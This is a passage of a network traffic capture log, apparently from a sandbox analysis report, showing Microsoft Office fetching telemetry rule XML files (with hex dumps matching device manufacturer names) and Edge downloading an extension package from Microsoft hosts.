                                                                                                                                                                                                        x-azure-ref: 20241204T125324Z-1746fd949bdkw94lhC1EWRxuz400000001c0000000007wz8
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:24 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        32192.168.2.74974413.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:24 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:24 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 404
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                                        x-ms-request-id: 1e40fce6-401e-0078-1bd2-454d34000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125324Z-1746fd949bdwt8wrhC1EWRu6rg00000001cg000000006kes
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:24 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        33192.168.2.74974313.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:24 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:24 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                                        x-ms-request-id: dbf7ebc2-101e-00a2-0ac7-459f2e000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125324Z-1746fd949bdqpttnhC1EWRe1wg00000000w000000000ast6
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:24 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        34192.168.2.74974613.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:24 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:24 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 428
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                                        x-ms-request-id: c29bf332-501e-00a0-0ccb-459d9f000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125324Z-1746fd949bdw2rg8hC1EWR11u400000001mg00000000054z
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:24 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        35192.168.2.74974513.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:25 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:25 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                                        x-ms-request-id: 76d3483c-401e-00a3-2bcc-458b09000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125325Z-1746fd949bdtlp5chC1EWRq1v4000000013000000000a2fe
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:25 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        36192.168.2.74975313.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:26 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:26 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 499
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                                        x-ms-request-id: 167d53f1-601e-0084-47cc-456b3f000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125326Z-1746fd949bdhk6hphC1EWRaw3c000000012g0000000027m2
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:27 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        37192.168.2.74975413.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:26 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:26 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 415
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                                        x-ms-request-id: e4103400-101e-008e-08d4-45cf88000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125326Z-1746fd949bd9x4mhhC1EWRb76n000000017g000000008n4y
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:27 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        38192.168.2.74975513.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:26 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:26 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 471
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                                        x-ms-request-id: daea1f5e-401e-005b-68d1-459c0c000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125326Z-1746fd949bddgsvjhC1EWRum2c00000001cg00000000be1c
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:27 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        39192.168.2.74975613.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:26 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:26 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                                        x-ms-request-id: 490c4061-c01e-000b-75c3-45e255000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125326Z-1746fd949bd9x4mhhC1EWRb76n00000001bg000000002d2k
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:27 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        40192.168.2.749757152.195.19.974437688C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:27 UTC616OUTGET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1733921603&P2=404&P3=2&P4=ZIvu7wxXJfTdiYCEjh%2bpUqdpN0YGnzWKN%2fzhMh4n7EnQrCjEd46ENEFi81ZF0oVELsrsbXGChzfLS5WtNCyd7g%3d%3d HTTP/1.1
                                                                                                                                                                                                        Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        MS-CV: vrdgwOh3Q8lJkzwFjOBobQ
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                        2024-12-04 12:53:27 UTC633INHTTP/1.1 200 OK
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 13243338
                                                                                                                                                                                                        Cache-Control: public, max-age=17280000
                                                                                                                                                                                                        Content-Type: application/x-chrome-extension
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:27 GMT
                                                                                                                                                                                                        Etag: "Gv3jDkaZdFLRHkoq2781zOehQE8="
                                                                                                                                                                                                        Last-Modified: Wed, 24 Jan 2024 00:25:37 GMT
                                                                                                                                                                                                        MS-CorrelationId: b4b4aabf-4d02-4629-96b1-a382405b6a31
                                                                                                                                                                                                        MS-CV: 642I+iNy0Qp5KFcIV/sUKh.0
                                                                                                                                                                                                        MS-RequestId: 5245ac9e-0afd-43ce-8780-5c7d0bedf1d4
                                                                                                                                                                                                        Server: ECAcc (nyd/D11E)
                                                                                                                                                                                                        X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                        X-AspNetMvc-Version: 5.3
                                                                                                                                                                                                        X-Cache: HIT
                                                                                                                                                                                                        X-CCC: US
                                                                                                                                                                                                        X-CID: 11
                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                        X-Powered-By: ARR/3.0
                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                        Content-Length: 11185
                                                                                                                                                                                                        Connection: close
